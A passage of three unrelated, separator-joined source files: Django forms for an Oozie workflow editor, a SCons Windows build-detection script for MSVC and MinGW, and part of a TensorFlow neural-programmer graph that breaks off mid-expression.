'files': forms.HiddenInput(),
'archives': forms.HiddenInput(),
'jar_path': forms.TextInput(attrs={'class': 'pathChooser span5'}),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class StreamingForm(forms.ModelForm):
"""Used for specifying a streaming action"""
class Meta:
model = Streaming
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'files': forms.widgets.HiddenInput(),
'archives': forms.widgets.HiddenInput(),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
'mapper': forms.TextInput(attrs={'class': 'span5'}),
'reducer': forms.TextInput(attrs={'class': 'span5'}),
}
class PigForm(forms.ModelForm):
class Meta:
model = Pig
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'params': forms.widgets.HiddenInput(),
'script_path': forms.TextInput(attrs={'class': 'pathChooser span5'}),
'files': forms.widgets.HiddenInput(),
'archives': forms.widgets.HiddenInput(),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class HiveForm(forms.ModelForm):
class Meta:
model = Hive
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'params': forms.widgets.HiddenInput(),
'script_path': forms.TextInput(attrs={'class': 'pathChooser span5'}),
'files': forms.widgets.HiddenInput(),
'archives': forms.widgets.HiddenInput(),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class SqoopForm(forms.ModelForm):
class Meta:
model = Sqoop
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'params': forms.widgets.HiddenInput(),
'script_path': forms.Textarea(attrs={'class': 'span8'}),
'files': forms.widgets.HiddenInput(),
'archives': forms.widgets.HiddenInput(),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class SshForm(forms.ModelForm):
class Meta:
model = Ssh
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'params': forms.widgets.HiddenInput(),
'description': forms.TextInput(attrs={'class': 'span5'}),
'command': forms.TextInput(attrs={'class': 'pathChooser span5'}),
}
class ShellForm(forms.ModelForm):
class Meta:
model = Shell
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'params': forms.widgets.HiddenInput(),
'command': forms.TextInput(attrs={'class': 'pathChooser span5'}),
'files': forms.widgets.HiddenInput(),
'archives': forms.widgets.HiddenInput(),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class DistCpForm(forms.ModelForm):
class Meta:
model = DistCp
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'params': forms.widgets.HiddenInput(),
'command': forms.TextInput(attrs={'class': 'pathChooser span5'}),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class FsForm(forms.ModelForm):
class Meta:
model = Fs
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'deletes': forms.widgets.HiddenInput(),
'mkdirs': forms.widgets.HiddenInput(),
'moves': forms.widgets.HiddenInput(),
'chmods': forms.widgets.HiddenInput(),
'touchzs': forms.widgets.HiddenInput(),
}
class EmailForm(forms.ModelForm):
class Meta:
model = Email
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'to': forms.TextInput(attrs={'class': 'span8'}),
'cc': forms.TextInput(attrs={'class': 'span8'}),
'subject': forms.TextInput(attrs={'class': 'span8'}),
'body': forms.Textarea(attrs={'class': 'span8'}),
}
class SubWorkflowForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
user = kwargs.pop('user')
workflow = kwargs.pop('workflow')
super(SubWorkflowForm, self).__init__(*args, **kwargs)
choices=((wf.id, wf) for wf in Workflow.objects.available().filter(owner=user).exclude(id=workflow.id))
self.fields['sub_workflow'] = forms.ChoiceField(choices=choices, widget=forms.RadioSelect(attrs={'class':'radio'}))
class Meta:
model = SubWorkflow
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
}
def clean_sub_workflow(self):
try:
return Workflow.objects.get(id=int(self.cleaned_data.get('sub_workflow')))
except Exception, e:
raise ValidationError(_('The sub-workflow could not be found: %s' % e))
class GenericForm(forms.ModelForm):
class Meta:
model = Generic
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'xml': forms.Textarea(attrs={'class': 'span8'})
}
class LinkForm(forms.ModelForm):
comment = forms.CharField(label='if', max_length=1024, required=True, widget=forms.TextInput(attrs={'class': 'span8'}))
class Meta:
model = Link
exclude = NodeForm.Meta.ALWAYS_HIDE + ('parent', 'child', 'name')
class DefaultLinkForm(forms.ModelForm):
class Meta:
model = Link
exclude = NodeForm.Meta.ALWAYS_HIDE + ('parent', 'comment', 'name')
def __init__(self, *args, **kwargs):
workflow = kwargs['action'].workflow
del kwargs['action']
super(DefaultLinkForm, self).__init__(*args, **kwargs)
self.fields['child'].widget = forms.Select(choices=((node.id, node) for node in set(workflow.node_set.all())))
DATE_FORMAT = '%m/%d/%Y'
TIME_FORMAT = '%I:%M %p'
class NumberInput(TextInput):
input_type = 'number'
class CoordinatorForm(forms.ModelForm):
start = forms.SplitDateTimeField(input_time_formats=[TIME_FORMAT],
widget=SplitDateTimeWidget(attrs={'class': 'input-small', 'id': 'coordinator_start'},
date_format=DATE_FORMAT, time_format=TIME_FORMAT))
end = forms.SplitDateTimeField(input_time_formats=[TIME_FORMAT],
widget=SplitDateTimeWidget(attrs={'class': 'input-small', 'id': 'coordinator_end'},
date_format=DATE_FORMAT, time_format=TIME_FORMAT))
class Meta:
model = Coordinator
exclude = ('owner', 'deployment_dir')
widgets = {
'description': forms.TextInput(attrs={'class': 'span5'}),
'parameters': forms.widgets.HiddenInput(),
'job_properties': forms.widgets.HiddenInput(),
'schema_version': forms.widgets.HiddenInput(),
'timeout': NumberInput(),
}
def __init__(self, *args, **kwargs):
user = kwargs['user']
del kwargs['user']
super(CoordinatorForm, self).__init__(*args, **kwargs)
qs = Workflow.objects.available().filter(Q(is_shared=True) | Q(owner=user))
workflows = []
for workflow in qs:
if workflow.is_accessible(user):
workflows.append(workflow.id)
qs = qs.filter(id__in=workflows)
self.fields['workflow'].queryset = qs
class DatasetForm(forms.ModelForm):
start = forms.SplitDateTimeField(input_time_formats=[TIME_FORMAT],
widget=SplitDateTimeWidget(attrs={'class': 'short'},
date_format=DATE_FORMAT, time_format=TIME_FORMAT))
class Meta:
model = Dataset
exclude = ('coordinator',)
widgets = {
'description': forms.TextInput(attrs={'class': 'span5'}),
'uri': forms.TextInput(attrs={'class': 'span5'}),
}
def __init__(self, *args, **kwargs):
super(DatasetForm, self).__init__(*args, **kwargs)
class DataInputForm(forms.ModelForm):
class Meta:
model = DataInput
exclude = ('coordinator',)
def __init__(self, *args, **kwargs):
coordinator = kwargs['coordinator']
del kwargs['coordinator']
super(DataInputForm, self).__init__(*args, **kwargs)
self.fields['dataset'].queryset = Dataset.objects.filter(coordinator=coordinator)
if coordinator.workflow:
self.fields['name'].widget = forms.Select(choices=((param, param) for param in set(coordinator.workflow.find_parameters())))
class DataOutputForm(forms.ModelForm):
class Meta:
model = DataOutput
exclude = ('coordinator',)
def __init__(self, *args, **kwargs):
coordinator = kwargs['coordinator']
del kwargs['coordinator']
super(DataOutputForm, self).__init__(*args, **kwargs)
self.fields['dataset'].queryset = Dataset.objects.filter(coordinator=coordinator)
if coordinator.workflow:
self.fields['name'].widget = forms.Select(choices=((param, param) for param in set(coordinator.workflow.find_parameters())))
_node_type_TO_FORM_CLS = {
Mapreduce.node_type: MapreduceForm,
Streaming.node_type: StreamingForm,
Java.node_type: JavaForm,
Pig.node_type: PigForm,
Hive.node_type: HiveForm,
Sqoop.node_type: SqoopForm,
Ssh.node_type: SshForm,
Shell.node_type: ShellForm,
DistCp.node_type: DistCpForm,
Fs.node_type: FsForm,
Email.node_type: EmailForm,
SubWorkflow.node_type: SubWorkflowForm,
Generic.node_type: GenericForm,
}
class RerunForm(forms.Form):
skip_nodes = forms.MultipleChoiceField(required=False)
def __init__(self, *args, **kwargs):
oozie_workflow = kwargs.pop('oozie_workflow')
# Build list of skip nodes
decisions = filter(lambda node: node.type == 'switch', oozie_workflow.get_control_flow_actions())
working_actions = oozie_workflow.get_working_actions()
skip_nodes = []
for action in decisions + working_actions:
if action.status == 'OK':
skip_nodes.append((action.name, action.name))
initial_skip_nodes = oozie_workflow.conf_dict.get('oozie.wf.rerun.skip.nodes', '').split()
super(RerunForm, self).__init__(*args, **kwargs)
self.fields['skip_nodes'].choices = skip_nodes
self.fields['skip_nodes'].initial = initial_skip_nodes
class RerunCoordForm(forms.Form):
refresh = forms.BooleanField(initial=True, required=False, help_text=_t('Used to indicate if user wants to cleanup output events for given rerun actions'))
nocleanup = forms.BooleanField(initial=True, required=False, help_text=_t("Used to indicate if user wants to refresh an action's input and output events"))
actions = forms.MultipleChoiceField(required=True)
def __init__(self, *args, **kwargs):
oozie_coordinator = kwargs.pop('oozie_coordinator')
super(RerunCoordForm, self).__init__(*args, **kwargs)
self.fields['actions'].choices = [(action.actionNumber, action.title) for action in reversed(oozie_coordinator.get_working_actions())]
class RerunBundleForm(forms.Form):
refresh = forms.BooleanField(initial=True, required=False, help_text=_t('Used to indicate if user wants to cleanup output events for given rerun actions'))
nocleanup = forms.BooleanField(initial=True, required=False, help_text=_t("Used to indicate if user wants to refresh an action's input and output events"))
coordinators = forms.MultipleChoiceField(required=True)
start = forms.SplitDateTimeField(input_time_formats=[TIME_FORMAT], required=False, initial=datetime.today(),
widget=SplitDateTimeWidget(attrs={'class': 'input-small', 'id': 'rerun_start'},
date_format=DATE_FORMAT, time_format=TIME_FORMAT))
end = forms.SplitDateTimeField(input_time_formats=[TIME_FORMAT], required=False, initial=datetime.today() + timedelta(days=3),
widget=SplitDateTimeWidget(attrs={'class': 'input-small', 'id': 'rerun_end'},
date_format=DATE_FORMAT, time_format=TIME_FORMAT))
def __init__(self, *args, **kwargs):
oozie_bundle = kwargs.pop('oozie_bundle')
super(RerunBundleForm, self).__init__(*args, **kwargs)
self.fields['coordinators'].choices = [(action.name, action.name) for action in reversed(oozie_bundle.actions)]
self.fields['coordinators'].initial = [action.name for action in reversed(oozie_bundle.actions)]
class BundledCoordinatorForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(BundledCoordinatorForm, self).__init__(*args, **kwargs)
self.fields['coordinator'].empty_label = None
class Meta:
model = BundledCoordinator
exclude = ('bundle',)
widgets = {
'parameters': forms.widgets.HiddenInput(),
}
class BundleForm(forms.ModelForm):
kick_off_time = forms.SplitDateTimeField(input_time_formats=[TIME_FORMAT],
widget=SplitDateTimeWidget(attrs={'class': 'input-small', 'id': 'bundle_kick_off_time'},
date_format=DATE_FORMAT, time_format=TIME_FORMAT))
class Meta:
model = Bundle
exclude = ('owner', 'coordinators')
widgets = {
'description': forms.TextInput(attrs={'class': 'span5'}),
'parameters': forms.widgets.HiddenInput(),
'schema_version': forms.widgets.HiddenInput(),
}
def design_form_by_type(node_type, user, workflow):
klass_form = _node_type_TO_FORM_CLS[node_type]
if node_type == 'subworkflow':
klass_form = curry(klass_form, user=user, workflow=workflow)
return klass_form
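# Rough usage sketch (the node_type string and request objects here are illustrative):
#   form_cls = design_form_by_type(Pig.node_type, request.user, workflow)
#   form = form_cls(data=request.POST)
# For the 'subworkflow' node type the returned callable is already curried with the
# user and workflow keyword arguments expected by SubWorkflowForm.__init__.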
def design_form_by_instance(design_obj, data=None):
action_obj = design_obj.get_root_action()
cls = _node_type_TO_FORM_CLS[action_obj.node_type]
instances = dict(wf=design_obj, action=action_obj)
res = MultiForm(wf=WorkflowForm, action=cls)
res.bind(data=data, instances=instances)
return res
|
|
#
# tested on | Windows native | Linux cross-compilation
# ------------------------+-------------------+---------------------------
# MSVS C++ 2010 Express | WORKS | n/a
# Mingw-w64 | WORKS | WORKS
# Mingw-w32 | WORKS | WORKS
# MinGW | WORKS | untested
#
#####
# Notes about MSVS C++ :
#
# - MSVC2010-Express compiles to 32bits only.
#
#####
# Notes about Mingw-w64 and Mingw-w32 under Windows :
#
# - both can be installed using the official installer :
# http://mingw-w64.sourceforge.net/download.php#mingw-builds
#
# - if you want to compile both 32bits and 64bits, don't forget to
# run the installer twice to install them both.
#
# - install them into a path that does not contain spaces
# ( example : "C:/Mingw-w32", "C:/Mingw-w64" )
#
# - if you want to compile faster using the "-j" option, don't forget
# to install the appropriate version of the Pywin32 python extension
# available from : http://sourceforge.net/projects/pywin32/files/
#
# - before running scons, you must add into the environment path
# the path to the "/bin" directory of the Mingw version you want
# to use :
#
# set PATH=C:/Mingw-w32/bin;%PATH%
#
# - then, scons should be able to detect gcc.
# - Mingw-w32 only compiles 32bits.
# - Mingw-w64 only compiles 64bits.
#
# - it is possible to add them both at the same time into the PATH env,
# if you also define the MINGW32_PREFIX and MINGW64_PREFIX environment
# variables.
# For instance, you could store that set of commands into a .bat script
# that you would run just before scons :
#
# set PATH=C:\mingw-w32\bin;%PATH%
# set PATH=C:\mingw-w64\bin;%PATH%
# set MINGW32_PREFIX=C:\mingw-w32\bin\
# set MINGW64_PREFIX=C:\mingw-w64\bin\
#
#####
# Notes about Mingw, Mingw-w64 and Mingw-w32 under Linux :
#
# - default toolchain prefixes are :
# "i586-mingw32msvc-" for MinGW
# "i686-w64-mingw32-" for Mingw-w32
# "x86_64-w64-mingw32-" for Mingw-w64
#
# - if both MinGW and Mingw-w32 are installed on your system
# Mingw-w32 should take priority over MinGW.
#
# - it is possible to manually override prefixes by defining
# the MINGW32_PREFIX and MINGW64_PREFIX environment variables.
#
#####
# Notes about Mingw under Windows :
#
# - this is the MinGW version from http://mingw.org/
# - install it into a path that does not contain spaces
# ( example : "C:/MinGW" )
# - several DirectX headers might be missing. You can copy them into
# the "C:/MinGW/include" directory from this page :
# https://code.google.com/p/mingw-lib/source/browse/trunk/working/avcodec_to_widget_5/directx_include/
# - before running scons, add the path to the "/bin" directory :
# set PATH=C:/MinGW/bin;%PATH%
# - scons should be able to detect gcc.
#
#####
# TODO :
#
# - finish cleaning up this script to remove all the remains of previous hacks and workarounds
# - make it work with the Windows7 SDK that is supposed to enable 64bits compilation for MSVC2010-Express
# - confirm it works well with other Visual Studio versions.
# - update the wiki about the pywin32 extension required for the "-j" option under Windows.
# - update the wiki to document MINGW32_PREFIX and MINGW64_PREFIX
#
import os
import sys
def is_active():
return True
def get_name():
return "Windows"
def can_build():
if (os.name=="nt"):
#building natively on windows!
if (os.getenv("VSINSTALLDIR")):
return True
else:
print("\nMSVC not detected, attempting Mingw.")
mingw32 = ""
mingw64 = ""
if ( os.getenv("MINGW32_PREFIX") ) :
mingw32 = os.getenv("MINGW32_PREFIX")
if ( os.getenv("MINGW64_PREFIX") ) :
mingw64 = os.getenv("MINGW64_PREFIX")
test = "gcc --version > NUL 2>&1"
if os.system(test)!= 0 and os.system(mingw32+test)!=0 and os.system(mingw64+test)!=0 :
print("- could not detect gcc.")
print("Please, make sure a path to a Mingw /bin directory is accessible into the environment PATH.\n")
return False
else:
print("- gcc detected.")
return True
if (os.name=="posix"):
mingw = "i586-mingw32msvc-"
mingw64 = "x86_64-w64-mingw32-"
mingw32 = "i686-w64-mingw32-"
if (os.getenv("MINGW32_PREFIX")):
mingw32=os.getenv("MINGW32_PREFIX")
mingw = mingw32
if (os.getenv("MINGW64_PREFIX")):
mingw64=os.getenv("MINGW64_PREFIX")
test = "gcc --version &>/dev/null"
if (os.system(mingw+test) == 0 or os.system(mingw64+test) == 0 or os.system(mingw32+test) == 0):
return True
return False
def get_opts():
mingw=""
mingw32=""
mingw64=""
if ( os.name == "posix" ):
mingw = "i586-mingw32msvc-"
mingw32 = "i686-w64-mingw32-"
mingw64 = "x86_64-w64-mingw32-"
if os.system(mingw32+"gcc --version &>/dev/null") != 0 :
mingw32 = mingw
if (os.getenv("MINGW32_PREFIX")):
mingw32=os.getenv("MINGW32_PREFIX")
mingw = mingw32
if (os.getenv("MINGW64_PREFIX")):
mingw64=os.getenv("MINGW64_PREFIX")
return [
('mingw_prefix','Mingw Prefix',mingw32),
('mingw_prefix_64','Mingw Prefix 64 bits',mingw64),
]
def get_flags():
return [
('freetype','builtin'), #use builtin freetype
('openssl','builtin'), #use builtin openssl
('theora','no'),
]
def configure(env):
env.Append(CPPPATH=['#platform/windows'])
if (os.name=="nt" and os.getenv("VSINSTALLDIR")!=None):
#build using visual studio
env['ENV']['TMP'] = os.environ['TMP']
env.Append(CPPPATH=['#platform/windows/include'])
env.Append(LIBPATH=['#platform/windows/lib'])
if (env["freetype"]!="no"):
env.Append(CCFLAGS=['/DFREETYPE_ENABLED'])
env.Append(CPPPATH=['#tools/freetype'])
env.Append(CPPPATH=['#tools/freetype/freetype/include'])
if (env["target"]=="release"):
env.Append(CCFLAGS=['/O2'])
env.Append(LINKFLAGS=['/SUBSYSTEM:WINDOWS'])
env.Append(LINKFLAGS=['/ENTRY:mainCRTStartup'])
elif (env["target"]=="release_debug"):
env.Append(CCFLAGS=['/O2','/DDEBUG_ENABLED'])
env.Append(LINKFLAGS=['/SUBSYSTEM:CONSOLE'])
elif (env["target"]=="debug_release"):
env.Append(CCFLAGS=['/Zi','/Od'])
env.Append(LINKFLAGS=['/DEBUG'])
env.Append(LINKFLAGS=['/SUBSYSTEM:WINDOWS'])
env.Append(LINKFLAGS=['/ENTRY:mainCRTStartup'])
elif (env["target"]=="debug"):
env.Append(CCFLAGS=['/Zi','/DDEBUG_ENABLED','/DDEBUG_MEMORY_ENABLED','/DD3D_DEBUG_INFO','/Od'])
env.Append(LINKFLAGS=['/SUBSYSTEM:CONSOLE'])
env.Append(LINKFLAGS=['/DEBUG'])
env.Append(CCFLAGS=['/MT','/Gd','/GR','/nologo'])
env.Append(CXXFLAGS=['/TP'])
env.Append(CPPFLAGS=['/DMSVC', '/GR', ])
env.Append(CCFLAGS=['/I'+os.getenv("WindowsSdkDir")+"/Include"])
env.Append(CCFLAGS=['/DWINDOWS_ENABLED'])
env.Append(CCFLAGS=['/DRTAUDIO_ENABLED'])
env.Append(CCFLAGS=['/DWIN32'])
env.Append(CCFLAGS=['/DTYPED_METHOD_BIND'])
env.Append(CCFLAGS=['/DGLES2_ENABLED'])
env.Append(CCFLAGS=['/DGLEW_ENABLED'])
LIBS=['winmm','opengl32','dsound','kernel32','ole32','user32','gdi32', 'IPHLPAPI','Shlwapi', 'wsock32', 'shell32','advapi32']
env.Append(LINKFLAGS=[p+env["LIBSUFFIX"] for p in LIBS])
env.Append(LIBPATH=[os.getenv("WindowsSdkDir")+"/Lib"])
if (os.getenv("DXSDK_DIR")):
DIRECTX_PATH=os.getenv("DXSDK_DIR")
else:
DIRECTX_PATH="C:/Program Files/Microsoft DirectX SDK (March 2009)"
if (os.getenv("VCINSTALLDIR")):
VC_PATH=os.getenv("VCINSTALLDIR")
else:
VC_PATH=""
env.Append(CCFLAGS=["/I" + p for p in os.getenv("INCLUDE").split(";")])
env.Append(LIBPATH=[p for p in os.getenv("LIB").split(";")])
env.Append(CCFLAGS=["/I"+DIRECTX_PATH+"/Include"])
env.Append(LIBPATH=[DIRECTX_PATH+"/Lib/x86"])
env['ENV'] = os.environ
else:
# Workaround for MinGW. See:
# http://www.scons.org/wiki/LongCmdLinesOnWin32
if (os.name=="nt"):
import subprocess
def mySubProcess(cmdline,env):
#print "SPAWNED : " + cmdline
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, startupinfo=startupinfo, shell = False, env = env)
data, err = proc.communicate()
rv = proc.wait()
if rv:
print "====="
print err
print "====="
return rv
def mySpawn(sh, escape, cmd, args, env):
newargs = ' '.join(args[1:])
cmdline = cmd + " " + newargs
rv=0
if len(cmdline) > 32000 and cmd.endswith("ar") :
cmdline = cmd + " " + args[1] + " " + args[2] + " "
for i in range(3,len(args)) :
rv = mySubProcess( cmdline + args[i], env )
if rv :
break
else:
rv = mySubProcess( cmdline, env )
return rv
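# Rationale for the spawn shim above (informal note): Windows limits a process command
# line to roughly 32k characters, which "ar" invocations listing many object files can
# exceed. When that happens the archive is built incrementally instead, re-running
# "ar <flags> <archive> <object>" once per remaining object file.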
env['SPAWN'] = mySpawn
#build using mingw
if (os.name=="nt"):
env['ENV']['TMP'] = os.environ['TMP'] #way to go scons, you can be so stupid sometimes
else:
env["PROGSUFFIX"]=env["PROGSUFFIX"]+".exe" # for linux cross-compilation
mingw_prefix=""
if (env["bits"]=="default"):
env["bits"]="32"
if (env["bits"]=="32"):
env.Append(LINKFLAGS=['-static'])
env.Append(LINKFLAGS=['-static-libgcc'])
env.Append(LINKFLAGS=['-static-libstdc++'])
mingw_prefix=env["mingw_prefix"];
else:
env.Append(LINKFLAGS=['-static'])
mingw_prefix=env["mingw_prefix_64"];
nulstr=""
if (os.name=="posix"):
nulstr=">/dev/null"
else:
nulstr=">nul"
# if os.system(mingw_prefix+"gcc --version"+nulstr)!=0:
# #not really super consistent but..
# print("Can't find Windows compiler: "+mingw_prefix)
# sys.exit(255)
if (env["target"]=="release"):
env.Append(CCFLAGS=['-O3','-ffast-math','-fomit-frame-pointer','-msse2'])
env.Append(LINKFLAGS=['-Wl,--subsystem,windows'])
elif (env["target"]=="release_debug"):
env.Append(CCFLAGS=['-O2','-DDEBUG_ENABLED'])
elif (env["target"]=="debug"):
env.Append(CCFLAGS=['-g', '-Wall','-DDEBUG_ENABLED','-DDEBUG_MEMORY_ENABLED'])
if (env["freetype"]!="no"):
env.Append(CCFLAGS=['-DFREETYPE_ENABLED'])
env.Append(CPPPATH=['#tools/freetype'])
env.Append(CPPPATH=['#tools/freetype/freetype/include'])
env["CC"]=mingw_prefix+"gcc"
env['AS']=mingw_prefix+"as"
env['CXX'] = mingw_prefix+"g++"
env['AR'] = mingw_prefix+"ar"
env['RANLIB'] = mingw_prefix+"ranlib"
env['LD'] = mingw_prefix+"g++"
#env['CC'] = "winegcc"
#env['CXX'] = "wineg++"
env.Append(CCFLAGS=['-DWINDOWS_ENABLED','-mwindows'])
env.Append(CPPFLAGS=['-DRTAUDIO_ENABLED'])
env.Append(CCFLAGS=['-DGLES2_ENABLED','-DGLEW_ENABLED'])
env.Append(LIBS=['mingw32','opengl32', 'dsound', 'ole32', 'd3d9','winmm','gdi32','iphlpapi','shlwapi','wsock32','kernel32'])
# if (env["bits"]=="32"):
# # env.Append(LIBS=['gcc_s'])
# #--with-arch=i686
# env.Append(CPPFLAGS=['-march=i686'])
# env.Append(LINKFLAGS=['-march=i686'])
#'d3dx9d'
env.Append(CPPFLAGS=['-DMINGW_ENABLED'])
env.Append(LINKFLAGS=['-g'])
import methods
env.Append( BUILDERS = { 'GLSL120' : env.Builder(action = methods.build_legacygl_headers, suffix = 'glsl.h',src_suffix = '.glsl') } )
env.Append( BUILDERS = { 'GLSL' : env.Builder(action = methods.build_glsl_headers, suffix = 'glsl.h',src_suffix = '.glsl') } )
env.Append( BUILDERS = { 'HLSL9' : env.Builder(action = methods.build_hlsl_dx9_headers, suffix = 'hlsl.h',src_suffix = '.hlsl') } )
env.Append( BUILDERS = { 'GLSL120GLES' : env.Builder(action = methods.build_gles2_headers, suffix = 'glsl.h',src_suffix = '.glsl') } )
|
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Author: aneelakantan (Arvind Neelakantan)
"""
import numpy as np
import tensorflow as tf
import nn_utils
class Graph():
def __init__(self, utility, batch_size, max_passes, mode="train"):
self.utility = utility
self.data_type = self.utility.tf_data_type[self.utility.FLAGS.data_type]
self.max_elements = self.utility.FLAGS.max_elements
max_elements = self.utility.FLAGS.max_elements
self.num_cols = self.utility.FLAGS.max_number_cols
self.num_word_cols = self.utility.FLAGS.max_word_cols
self.question_length = self.utility.FLAGS.question_length
self.batch_size = batch_size
self.max_passes = max_passes
self.mode = mode
self.embedding_dims = self.utility.FLAGS.embedding_dims
#input question and a mask
self.batch_question = tf.placeholder(tf.int32,
[batch_size, self.question_length])
self.batch_question_attention_mask = tf.placeholder(
self.data_type, [batch_size, self.question_length])
#ground truth scalar answer and lookup answer
self.batch_answer = tf.placeholder(self.data_type, [batch_size])
self.batch_print_answer = tf.placeholder(
self.data_type,
[batch_size, self.num_cols + self.num_word_cols, max_elements])
#number columns and its processed version
self.batch_number_column = tf.placeholder(
self.data_type, [batch_size, self.num_cols, max_elements
]) #columns with numeric entries
self.batch_processed_number_column = tf.placeholder(
self.data_type, [batch_size, self.num_cols, max_elements])
self.batch_processed_sorted_index_number_column = tf.placeholder(
tf.int32, [batch_size, self.num_cols, max_elements])
#word columns and its processed version
self.batch_processed_word_column = tf.placeholder(
self.data_type, [batch_size, self.num_word_cols, max_elements])
self.batch_processed_sorted_index_word_column = tf.placeholder(
tf.int32, [batch_size, self.num_word_cols, max_elements])
self.batch_word_column_entry_mask = tf.placeholder(
tf.int32, [batch_size, self.num_word_cols, max_elements])
#names of word and number columns along with their mask
self.batch_word_column_names = tf.placeholder(
tf.int32,
[batch_size, self.num_word_cols, self.utility.FLAGS.max_entry_length])
self.batch_word_column_mask = tf.placeholder(
self.data_type, [batch_size, self.num_word_cols])
self.batch_number_column_names = tf.placeholder(
tf.int32,
[batch_size, self.num_cols, self.utility.FLAGS.max_entry_length])
self.batch_number_column_mask = tf.placeholder(self.data_type,
[batch_size, self.num_cols])
#exact match and group by max operation
self.batch_exact_match = tf.placeholder(
self.data_type,
[batch_size, self.num_cols + self.num_word_cols, max_elements])
self.batch_column_exact_match = tf.placeholder(
self.data_type, [batch_size, self.num_cols + self.num_word_cols])
self.batch_group_by_max = tf.placeholder(
self.data_type,
[batch_size, self.num_cols + self.num_word_cols, max_elements])
#numbers in the question along with their position. This is used to compute arguments to the comparison operations
self.batch_question_number = tf.placeholder(self.data_type, [batch_size, 1])
self.batch_question_number_one = tf.placeholder(self.data_type,
[batch_size, 1])
self.batch_question_number_mask = tf.placeholder(
self.data_type, [batch_size, max_elements])
self.batch_question_number_one_mask = tf.placeholder(self.data_type,
[batch_size, 1])
self.batch_ordinal_question = tf.placeholder(
self.data_type, [batch_size, self.question_length])
self.batch_ordinal_question_one = tf.placeholder(
self.data_type, [batch_size, self.question_length])
def LSTM_question_embedding(self, sentence, sentence_length):
#LSTM processes the input question
lstm_params = "question_lstm"
hidden_vectors = []
sentence = self.batch_question
question_hidden = tf.zeros(
[self.batch_size, self.utility.FLAGS.embedding_dims], self.data_type)
question_c_hidden = tf.zeros(
[self.batch_size, self.utility.FLAGS.embedding_dims], self.data_type)
if (self.utility.FLAGS.rnn_dropout > 0.0):
if (self.mode == "train"):
rnn_dropout_mask = tf.cast(
tf.random_uniform(
tf.shape(question_hidden), minval=0.0, maxval=1.0) <
self.utility.FLAGS.rnn_dropout,
self.data_type) / self.utility.FLAGS.rnn_dropout
else:
rnn_dropout_mask = tf.ones_like(question_hidden)
for question_iterator in range(self.question_length):
curr_word = sentence[:, question_iterator]
question_vector = nn_utils.apply_dropout(
nn_utils.get_embedding(curr_word, self.utility, self.params),
self.utility.FLAGS.dropout, self.mode)
question_hidden, question_c_hidden = nn_utils.LSTMCell(
question_vector, question_hidden, question_c_hidden, lstm_params,
self.params)
if (self.utility.FLAGS.rnn_dropout > 0.0):
question_hidden = question_hidden * rnn_dropout_mask
hidden_vectors.append(tf.expand_dims(question_hidden, 0))
hidden_vectors = tf.concat(0, hidden_vectors)
return question_hidden, hidden_vectors
def history_recurrent_step(self, curr_hprev, hprev):
#A single RNN step for controller or history RNN
return tf.tanh(
tf.matmul(
tf.concat(1, [hprev, curr_hprev]), self.params[
"history_recurrent"])) + self.params["history_recurrent_bias"]
def question_number_softmax(self, hidden_vectors):
#Attention on question to decide the question number to be passed to comparison ops
def compute_ans(op_embedding, comparison):
op_embedding = tf.expand_dims(op_embedding, 0)
#dot product of operation embedding with hidden state to the left of the number occurrence
first = tf.transpose(
tf.matmul(op_embedding,
tf.transpose(
tf.reduce_sum(hidden_vectors * tf.tile(
tf.expand_dims(
tf.transpose(self.batch_ordinal_question), 2),
[1, 1, self.utility.FLAGS.embedding_dims]), 0))))
second = self.batch_question_number_one_mask + tf.transpose(
tf.matmul(op_embedding,
tf.transpose(
tf.reduce_sum(hidden_vectors * tf.tile(
tf.expand_dims(
tf.transpose(self.batch_ordinal_question_one), 2
), [1, 1, self.utility.FLAGS.embedding_dims]), 0))))
question_number_softmax = tf.nn.softmax(tf.concat(1, [first, second]))
if (self.mode == "test"):
cond = tf.equal(question_number_softmax,
tf.reshape(
tf.reduce_max(question_number_softmax, 1),
[self.batch_size, 1]))
question_number_softmax = tf.select(
cond,
